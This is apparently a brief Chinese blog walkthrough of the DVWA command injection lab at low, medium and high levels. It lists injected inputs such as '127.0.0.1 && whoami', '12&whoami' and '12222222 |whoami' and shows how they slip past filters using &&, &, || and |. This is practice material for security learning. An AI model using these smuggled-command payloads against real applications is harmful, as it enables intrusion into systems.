title: DVWA-Command Injection
tags: DVWA
abbrlink: 3bcd059
date: 2022-09-30 08:39:36

Vulnerability: Command Injection

  • 根据程序调用系统命令。

image-20220930082345071

low

一、输入:127.0.0.1 && ipconfig
ipconfig命令是DOS系统中的命令,可以帮助用户查看网络状况,可以看到你想看到的众多网络信息,比如延迟,IP,主机信息,物理地址信息等等。

二、输入:127.0.0.1 && whoami

image-20220930082634426

Medium

image-20220930083130509

  • 同样的命令报错

  • 可能是这里&&被过滤了,那我们就试一下其它的连接方法。

  • 12 || whoami

image-20220930083317680

  • 输入:12&whoami 成功获得账户

image-20220930083448012

  • 源码

image-20220930083520373

High

  • 源码

image-20220930083617016

  • 更多过滤

不过还是有漏洞比如:
输入:12222222 |whoami
中间不加空格
成功获得账户

image-20220930083805833

Impossible